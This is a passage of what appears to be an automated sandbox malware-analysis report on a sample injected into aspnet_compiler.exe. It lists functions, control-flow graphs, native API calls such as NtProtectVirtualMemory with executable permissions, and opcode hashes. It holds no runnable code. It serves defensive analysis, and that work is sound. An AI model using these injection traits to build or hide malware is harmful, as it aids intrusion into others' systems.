                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E140
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID: HD@
                                                                                        • API String ID: 2167126740-1661062907
                                                                                        • Opcode ID: 3adc82e474bf7ea612b41e8e92983d4aeadebc022fc27032db594bc41ab1764e
                                                                                        • Instruction ID: c25d0c236890902e70dc421fe3a3f1b4992a56be477510d0afb3cc1ff4c2e007
                                                                                        • Opcode Fuzzy Hash: 3adc82e474bf7ea612b41e8e92983d4aeadebc022fc27032db594bc41ab1764e
                                                                                        • Instruction Fuzzy Hash: DFF01CB5210155BBDB18DF99DC40EDB3BADEF88354F118249FE5997292C630E821CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E107 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memorynativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3 41e107-41e11d 4 41e123-41e144 NtAllocateVirtualMemory 3->4 5 41e11e call 41eb97 3->5 5->4
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E140
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID: HD@
                                                                                        • API String ID: 2167126740-1661062907
                                                                                        • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                        • Instruction ID: 1bbea0d6684aa38b9cba9bc3d52488313a85d4e06c8950b3cee914a455dff4e2
                                                                                        • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                        • Instruction Fuzzy Hash: 13F01CB5200218ABCB14DF89DC41EDB77ADAF88754F018109BE0997241C630F810CBB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004012A4 Relevance: 1.7, APIs: 1, Instructions: 186nativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 212 4012a4-4014e7 call 4016b0 call 401260 call 401190 call 4016b0 * 2 call 4010a0 call 401730 227 4014f0-4014ff 212->227 228 401501-401504 227->228 229 401512-401519 227->229 228->229 230 401506-40150a 228->230 229->227 231 40151b 229->231 230->229 233 40150c-401510 230->233 232 40151e-401573 NtProtectVirtualMemory call 4016b0 231->232 238 401579 call 4230a7 232->238 239 401579 call 423098 232->239 233->229 235 401586-40158c 233->235 235->232 237 40157b-401585 238->237 239->237
                                                                                        APIs
                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2706961497-0
                                                                                        • Opcode ID: 96ce8ac611c70b4431666794c3e1fe1c15bef561e967fa11929c25d7882d575f
                                                                                        • Instruction ID: 71de5c6a7276698e0d335e6a23d6be08c669af7e3ebbfdb7f5df680e5d8ddb88
                                                                                        • Opcode Fuzzy Hash: 96ce8ac611c70b4431666794c3e1fe1c15bef561e967fa11929c25d7882d575f
                                                                                        • Instruction Fuzzy Hash: 139134B1C2035C9ADF20DFE5CC85AEEBBB4BF99304F20521EE444BB251EBB416858B55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041DF21 Relevance: 1.6, APIs: 1, Instructions: 73filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 240 41df21-41df25 241 41df27-41df78 call 41eb97 NtCreateFile 240->241 242 41df96-41dfd0 call 41eb97 240->242 241->242
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,00418893,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00418893,00000000,00000005,00000060,00000000,00000000), ref: 0041DF74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 9cd8a43f64e31843e306f9b38ad9d4e328382c2e543e31fc07cf6339be309fc3
                                                                                        • Instruction ID: 9dc02513d68cb9577ef6d23df316cf8c54d7c9f0d40a0d4cc4b41e56ff18d1de
                                                                                        • Opcode Fuzzy Hash: 9cd8a43f64e31843e306f9b38ad9d4e328382c2e543e31fc07cf6339be309fc3
                                                                                        • Instruction Fuzzy Hash: BE21D3B2204108AFCB18DF99DC80DEB77EDAF8C754B018208BA0D93241C630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004014E9 Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 278 4014e9 279 4014f0-4014ff 278->279 280 401501-401504 279->280 281 401512-401519 279->281 280->281 282 401506-40150a 280->282 281->279 283 40151b 281->283 282->281 285 40150c-401510 282->285 284 40151e-401573 NtProtectVirtualMemory call 4016b0 283->284 290 401579 call 4230a7 284->290 291 401579 call 423098 284->291 285->281 287 401586-40158c 285->287 287->284 289 40157b-401585 290->289 291->289
                                                                                        APIs
                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2706961497-0
                                                                                        • Opcode ID: 81b7f0ee7597ab049e8f6dd8ec5a706c108cb7f42cbd44d4c7ddb9476a4ca1c1
                                                                                        • Instruction ID: b2f12d9a5677002d627cc1d8f5431c92ceb830a7b7337b5bf708b8ebd629ea62
                                                                                        • Opcode Fuzzy Hash: 81b7f0ee7597ab049e8f6dd8ec5a706c108cb7f42cbd44d4c7ddb9476a4ca1c1
                                                                                        • Instruction Fuzzy Hash: 9C1182B1C14218AEEF34DEB5DC86AEEBBB8EB40728F30012ED911B61A1D37459458F84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041DF27 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 313 41df27-41df78 call 41eb97 NtCreateFile 316 41df96-41dfd0 call 41eb97 313->316
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,00418893,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00418893,00000000,00000005,00000060,00000000,00000000), ref: 0041DF74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                        • Instruction ID: 6448dc9dfb06a7df39d3f30f3df42fa8d08c553967d1b20781daee69f9e3092e
                                                                                        • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                        • Instruction Fuzzy Hash: C1F0CFB2204208AFCB08CF89DC85EEB37EDAF8C754F018208BA0D97241C630F851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041DFD7 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 320 41dfd7-41e020 call 41eb97 NtReadFile
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(00418A57,00413D23,FFFFFFFF,00418541,00000206,?,00418A57,00000206,00418541,FFFFFFFF,00413D23,00418A57,00000206,00000000), ref: 0041E01C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                        • Instruction ID: 7ac33d83bb922e9e5799d918d2943a80d62de890c863425acbc82b33401cc25d
                                                                                        • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                        • Instruction Fuzzy Hash: 7BF0A4B6200108ABCB14DF89DC85EEB77ADAF8C754F118249BE0D97241D630E811CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041E057 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(00418A35,00000206,?,00418A35,00000005,FFFFFFFF), ref: 0041E07C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_401000_aspnet_compiler.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                        • Instruction ID: b1d8fcc69f06d017c176d88ed9b5d0463e7edbaf1fdeccb5b0e24cd72fb2058f
                                                                                        • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                        • Instruction Fuzzy Hash: 47D01776204214ABD614EBA9DC89FD77BACDF48664F014555BA0D5B242C630FA008BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 2a5cf680ba9eda5fd298aaa23746fd239c40a96fc7f05304839ccec401e4544a
                                                                                        • Instruction ID: 90d18d4519f6211b56e83cfc3a432da97f35f55744a76483f2c9125aa1620d4a
                                                                                        • Opcode Fuzzy Hash: 2a5cf680ba9eda5fd298aaa23746fd239c40a96fc7f05304839ccec401e4544a
                                                                                        • Instruction Fuzzy Hash: 5B9002B120140402D54471D955087560045A7D0381F51C015B9055654EC7998DE576A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: a63aee71bb0dd2c726ce7ddd8d10a73e1d0681e218ec2b02aa52f55e693742c2
                                                                                        • Instruction ID: 0c7fd1aad40f6ba8163534a10a81bdde2592ec42f03756f13e827da7212dbc8c
                                                                                        • Opcode Fuzzy Hash: a63aee71bb0dd2c726ce7ddd8d10a73e1d0681e218ec2b02aa52f55e693742c2
                                                                                        • Instruction Fuzzy Hash: CF9002A134140442D50461D95518B160045E7E1381F51C019F5055654DC759CC627166
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 312b2129f6f28bf6b266748279853aa1025039ec2fdabf8f694d6dabb573ace9
                                                                                        • Instruction ID: c4358b73419def531f4cca8beb44ba53674ea4b7c6fc461bd0ad87b82dae0473
                                                                                        • Opcode Fuzzy Hash: 312b2129f6f28bf6b266748279853aa1025039ec2fdabf8f694d6dabb573ace9
                                                                                        • Instruction Fuzzy Hash: B0900261242441525949B1D955085174046B7E02C1791C016B5405A50CC6669866E661
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 8fef82dce6e88e09aea54531336880914059a88359e754e7e9416e77394a7f01
                                                                                        • Instruction ID: 9f35065c2b10eca58980f8c7fbb8984235fdbbb40fcf6ec64b2b423e2eec2153
                                                                                        • Opcode Fuzzy Hash: 8fef82dce6e88e09aea54531336880914059a88359e754e7e9416e77394a7f01
                                                                                        • Instruction Fuzzy Hash: 8990027120140413D51561D956087170049A7D02C1F91C416B4415658DD7968962B161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 68496f4fb7cae4b2b2ed6b293eb49ab1c5b3348dbb1c29c1e74282295bc46124
                                                                                        • Instruction ID: 98ece8703c6e05cd0a1990c7bfa548afe9d5c8b3cf3540dd94e7a869b2500a3c
                                                                                        • Opcode Fuzzy Hash: 68496f4fb7cae4b2b2ed6b293eb49ab1c5b3348dbb1c29c1e74282295bc46124
                                                                                        • Instruction Fuzzy Hash: 8E90026160140502D50571D95508626004AA7D02C1F91C026B5015655ECB6589A2B171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 6019a46bb1b51a565b8c11e90edbee857a34078ff8bd42b5fe9fd290ade8e8ca
                                                                                        • Instruction ID: 699bb5193664b2e0ffe15e35e68fee8ff0f4390cfa93d6865a91443eace95db9
                                                                                        • Opcode Fuzzy Hash: 6019a46bb1b51a565b8c11e90edbee857a34078ff8bd42b5fe9fd290ade8e8ca
                                                                                        • Instruction Fuzzy Hash: BB90027120180402D50461D9591871B0045A7D0382F51C015B5155655DC765886175B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ca0b1eacd814ff14cfeec2f9543d49e8a58d24c43bcd31d90ffcbbd1d5a343a9
                                                                                        • Instruction ID: d2df30eb5b30c29ed9286486e6256b758727d06b0dfd518907ad5e7ad594cef0
                                                                                        • Opcode Fuzzy Hash: ca0b1eacd814ff14cfeec2f9543d49e8a58d24c43bcd31d90ffcbbd1d5a343a9
                                                                                        • Instruction Fuzzy Hash: 3C90026160140042454471E999489164045BBE1291751C125B4989650DC699887566A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 76382e35a87381d4eb5256ea92b986f40a81a346636e54761cbd055c36b22fa0
                                                                                        • Instruction ID: 580be74f7ea378cd2400fa7a371c2a03aa60dd849de58416ad55e2545958cb2e
                                                                                        • Opcode Fuzzy Hash: 76382e35a87381d4eb5256ea92b986f40a81a346636e54761cbd055c36b22fa0
                                                                                        • Instruction Fuzzy Hash: CC900261211C0042D60465E95D18B170045A7D0383F51C119B4145654CCA5588716561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 68427cc141dfc4ca3398ec6588509def37216ad7b3b1aa326a8072b1e7778f4a
                                                                                        • Instruction ID: c6b5a8ab8ced848f19545345e10efe0e811fc97473e99557fa4d1d97a24fd142
                                                                                        • Opcode Fuzzy Hash: 68427cc141dfc4ca3398ec6588509def37216ad7b3b1aa326a8072b1e7778f4a
                                                                                        • Instruction Fuzzy Hash: 17900265211400030509A5D917085170086A7D53D1351C025F5006650CD76188716161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 2c3895094821acfbda34f37b85ee957e092686cf2e2e89197de8c91c2b7e3cd7
                                                                                        • Instruction ID: 3c85b12a45fc9c2941b1a50d27446448f0f9dd5356c4b2c2421cb910aa9983d2
                                                                                        • Opcode Fuzzy Hash: 2c3895094821acfbda34f37b85ee957e092686cf2e2e89197de8c91c2b7e3cd7
                                                                                        • Instruction Fuzzy Hash: 9C9002A120240003450971D95518626404AA7E0281B51C025F5005690DC66588A17165
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 429083cb28153acd264f80b215207bac02911435f31457061305c1c9ebb9cd3d
                                                                                        • Instruction ID: ccbe8312880494127483f89be4c38d34892ce181fad9c7fabfa4bde208b167cc
                                                                                        • Opcode Fuzzy Hash: 429083cb28153acd264f80b215207bac02911435f31457061305c1c9ebb9cd3d
                                                                                        • Instruction Fuzzy Hash: 2490027120140402D50465D9650C6560045A7E0381F51D015B9015655EC7A588A17171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 88bfb87a3e46924b41a6604ee0dd71e8dc354e09f6d6bafc0b6bab3b43c4ac5e
                                                                                        • Instruction ID: 56857aa8f23b2586f48c48b1231073cb527ed8253393c3551e5f8061e76dcde0
                                                                                        • Opcode Fuzzy Hash: 88bfb87a3e46924b41a6604ee0dd71e8dc354e09f6d6bafc0b6bab3b43c4ac5e
                                                                                        • Instruction Fuzzy Hash: 4990026921340002D58471D9650C61A0045A7D1282F91D419B4006658CCA5588796361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5603ef3ec8a675f4f08838c9bc7850471e0ee4b0b241c075a0834b833bff5b42
                                                                                        • Instruction ID: f42c5d6b5e4a0fd158d8540247a8211a8cc74f7d28a3bfd1084261ada41ce49f
                                                                                        • Opcode Fuzzy Hash: 5603ef3ec8a675f4f08838c9bc7850471e0ee4b0b241c075a0834b833bff5b42
                                                                                        • Instruction Fuzzy Hash: B390026130140003D54471D9651C6164045F7E1381F51D015F4405654CDA5588666262
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
